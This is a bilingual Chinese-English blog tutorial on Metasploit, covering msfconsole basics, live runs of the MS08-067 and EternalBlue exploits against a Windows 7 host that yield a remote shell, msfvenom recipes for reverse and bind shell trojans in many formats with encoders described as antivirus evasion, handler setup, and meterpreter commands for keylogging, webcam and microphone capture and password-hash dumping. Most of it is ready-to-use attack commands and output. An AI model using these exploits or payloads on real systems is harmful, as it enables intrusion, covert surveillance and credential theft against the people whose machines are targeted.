版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_20307987/article/details/80343072
I’m sorry for my english,0^0
(1) on kali2 start shell and input msfconsole
here i will explain some args for msfconsole
[+++++]. banner
you would see banner for etasploit,which information useful is :
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[+++++]. back
here:
> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > back
msf >
[+++++]check
when you use some module ,you can check target computer can be attacked or not
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.55
RHOST => 192.168.1.55
msf exploit(ms08_067_netapi) > check
[*] 192.168.1.55:445 The target is not exploitable.
msf exploit(ms08_067_netapi) >
[+++++]connect
when you test target computer’s port
msf > connect 192.168.1.55 8000
[*] Connected to 192.168.1.55:8000here has a tips: connect can use special srcaddress and srcport ,i remembered a ctf tester.
[+++++]info
which can use to look at module’s info
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > info
Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
Provided by:
hdm <[email protected]>
Brett Moore <[email protected]>
frank2 <[email protected]>
jduck <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
11 Windows XP SP2 Chinese - Traditional (NX)
12 Windows XP SP2 Czech (NX)
13 Windows XP SP2 Danish (NX)
14 Windows XP SP2 German (NX)
15 Windows XP SP2 Greek (NX)
16 Windows XP SP2 Spanish (NX)
17 Windows XP SP2 Finnish (NX)
18 Windows XP SP2 French (NX)
19 Windows XP SP2 Hebrew (NX)
20 Windows XP SP2 Hungarian (NX)
21 Windows XP SP2 Italian (NX)
22 Windows XP SP2 Japanese (NX)
23 Windows XP SP2 Korean (NX)
24 Windows XP SP2 Dutch (NX)
25 Windows XP SP2 Norwegian (NX)
26 Windows XP SP2 Polish (NX)
27 Windows XP SP2 Portuguese - Brazilian (NX)
28 Windows XP SP2 Portuguese (NX)
29 Windows XP SP2 Russian (NX)
30 Windows XP SP2 Swedish (NX)
31 Windows XP SP2 Turkish (NX)
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
37 Windows XP SP3 Danish (NX)
38 Windows XP SP3 German (NX)
39 Windows XP SP3 Greek (NX)
40 Windows XP SP3 Spanish (NX)
41 Windows XP SP3 Finnish (NX)
42 Windows XP SP3 French (NX)
43 Windows XP SP3 Hebrew (NX)
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
49 Windows XP SP3 Norwegian (NX)
50 Windows XP SP3 Polish (NX)
51 Windows XP SP3 Portuguese - Brazilian (NX)
52 Windows XP SP3 Portuguese (NX)
53 Windows XP SP3 Russian (NX)
54 Windows XP SP3 Swedish (NX)
55 Windows XP SP3 Turkish (NX)
56 Windows 2003 SP1 English (NO NX)
57 Windows 2003 SP1 English (NX)
58 Windows 2003 SP1 Japanese (NO NX)
59 Windows 2003 SP1 Spanish (NO NX)
60 Windows 2003 SP1 Spanish (NX)
61 Windows 2003 SP1 French (NO NX)
62 Windows 2003 SP1 French (NX)
63 Windows 2003 SP2 English (NO NX)
64 Windows 2003 SP2 English (NX)
65 Windows 2003 SP2 German (NO NX)
66 Windows 2003 SP2 German (NX)
67 Windows 2003 SP2 Portuguese - Brazilian (NX)
68 Windows 2003 SP2 Spanish (NO NX)
69 Windows 2003 SP2 Spanish (NX)
70 Windows 2003 SP2 Japanese (NO NX)
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.55 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 408
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References:
https://cvedetails.com/cve/CVE-2008-4250/
OSVDB (49243)
https://technet.microsoft.com/en-us/library/security/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf exploit(ms08_067_netapi) > [+++++]search
search is very useful,help info is here
msf exploit(ms08_067_netapi) > search -h
Usage: search [keywords]
Keywords:
app : Modules that are client or server attacks
author : Modules written by this author
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
name : Modules with a matching descriptive name
platform : Modules affecting this platform
ref : Modules with a matching ref
type : Modules of a specific type (exploit, auxiliary, or post)
Examples:
search cve:2009 type:exploit app:client
example is here
“search name:mysql”
“search platform:mysql” ---- can filter higer rank module
“search type:post”: --- metasploit can use three type (exploit \ auxiliary \ post)
“search author:dookie”
“search author:dookie name:MacOS”[+++++]Sessions
which can be allow manager session,when you hack target successful
[+++++]set
which can be use to set args for your attack target
[+++++]use
Oh,it very important and easy -^- biubiubiu
(2) here is example
[++++++]ms08_067
msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.55 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.101:4444
[*] 192.168.1.55:445 - Automatically detecting the target...
[*] 192.168.1.55:445 - Fingerprint: Windows 7 - - lang:Unknown
[*] 192.168.1.55:445 - We could not detect the language pack, defaulting to English
[-] 192.168.1.55:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
OK,i failed ,but i believe you can success![++++++]ms17_010
msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.55
RHOST => 192.168.1.55
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.101:4444
[*] 192.168.1.55:445 - Connecting to target for exploitation.
[+] 192.168.1.55:445 - Connection established for exploitation.
[+] 192.168.1.55:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.55:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.55:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.55:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 30 sional 7600
[+] 192.168.1.55:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.55:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.55:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.55:445 - Starting non-paged pool grooming
[+] 192.168.1.55:445 - Sending SMBv2 buffers
[+] 192.168.1.55:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.55:445 - Sending final SMBv2 buffers.
[*] 192.168.1.55:445 - Sending last fragment of exploit packet!
[*] 192.168.1.55:445 - Receiving response from exploit packet
[+] 192.168.1.55:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.55:445 - Sending egg to corrupted connection.
[*] 192.168.1.55:445 - Triggering free of corrupted buffer.
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.55:445 - Connecting to target for exploitation.
[+] 192.168.1.55:445 - Connection established for exploitation.
[+] 192.168.1.55:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.55:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.55:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.55:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 30 sional 7600
[+] 192.168.1.55:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.55:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.55:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.55:445 - Starting non-paged pool grooming
[+] 192.168.1.55:445 - Sending SMBv2 buffers
[+] 192.168.1.55:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.55:445 - Sending final SMBv2 buffers.
[*] 192.168.1.55:445 - Sending last fragment of exploit packet!
[*] 192.168.1.55:445 - Receiving response from exploit packet
[+] 192.168.1.55:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.55:445 - Sending egg to corrupted connection.
[*] 192.168.1.55:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.55:56666) at 2018-05-16 08:37:39 -0400
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>dir c:\
dir c:\
Volume in drive C has no label.
Volume Serial Number is 32F5-8E54
Directory of c:\
04/23/2018 04:01 AM <DIR> 3e8ad8e80165f13632b90d21195c66
07/13/2009 11:20 PM <DIR> PerfLogs
04/22/2018 10:48 PM <DIR> phpStudy
05/10/2018 02:43 AM <DIR> Program Files
05/14/2018 04:40 AM <DIR> Program Files (x86)
05/14/2018 11:24 PM <DIR> Python26
03/27/2018 08:33 AM <DIR> python27-x64
03/23/2018 04:52 AM <DIR> Users
05/16/2018 08:20 AM <DIR> Windows
05/15/2018 02:47 AM <DIR> ????
0 File(s) 0 bytes
10 Dir(s) 43,760,390,144 bytes free
OK ,i success and i believe you can do better!
(3)msfvenom
from
http://cache.baiducontent.com/c?m=9f65cb4a8c8507ed19fa950d100b96314c0bd73f7a83835221928448e435061e5a24feb827211206d1c77e6403a94e57e0f73766725e60e19497df0c8efad07672d36123706dd90005d269accc5124b137902cfeae69e5bbf6&p=9379c64ad4911fff57ed977a4c4382&newp=8f769a47838801eb08e2947d090581231610db2151d1d401298ffe0cc4241a1a1a3aecbf2025110ed9ce766d00a94d5fedf333723d0034f1f689df08d2ecce7e7ac36770&user=baidu&fm=sc&query=metasploit+ms15%2D034&qid=b3674fc600004194&p1=2作用:生成木马文件,替代早期版本的msfpayload和msfencoder。
Options
msfvenom命令行选项如下:
-p, --payload <payload> 指定需要使用的payload(攻击荷载)
-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
options usage
查看支持的payload列表:
msfvenom -l payloads
查看支持的输出文件类型:
msfvenom --help-formats
查看支持的编码方式:(为了达到免杀的效果)
msfvenom -l encoders
查看支持的空字段模块:(为了达到免杀的效果)
msfvenom -l nops
基础payload
命令格式
msfvenom -p <payload> <payload options> -f <format> -o <path>
Linux
反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
payload加编码
命令格式:
msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>
常用编码:
x86/shikata_ga_nai
cmd/powershell_base64
例子:
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe
自选模块
生成执行计算器payload例子:
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe(4)payload how to choose
linux相关payload:
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp
windows相关payload:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
连接木马
开启msf,启用exploit/multi/handler模块。
use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
set RHOST 10.0.0.1
set LPORT 12345
exploit
注意:这里set的payload跟生成木马使用的payload要一致,其余的参数根据选择的payload而填写。(5)when you get a meterpreter shell……
meterpreter shell
当我们拿到目标服务器的meterpreter_shell后,可以进行很多操作。
backgroud 将msf进程放到后台
session -i 1 将进程拖回前台运行
run vnc 远程桌面的开启
**文件管理功能:**
Download 下载文件
Edit 编辑
cat 查看
mkdir 创建
mv 移动
rm 删除
upload 上传
rmdir 删除文件夹
**网络及系统操作:**
Arp 看ARP缓冲表
Ifconfig IP地址网卡
Getproxy 获取代理
Netstat 查看端口链接
Kill 结束进程
Ps 查看进程
Reboot 重启电脑
Reg 修改注册表
Shell 获取shell
Shutdown 关闭电脑
sysinfo 获取电脑信息
**用户操作和其他功能讲解:**
enumdesktops 用户登录数
keyscan_dump 键盘记录-下载
keyscan_start 键盘记录 - 开始
keyscan_stop 键盘记录 - 停止
Uictl 获取键盘鼠标控制权
record_mic 音频录制
webcam_chat 查看摄像头接口
webcam_list 查看摄像头列表
webcam_stream 摄像头视频获取
Getsystem 获取高权限
Hashdump 下载HASH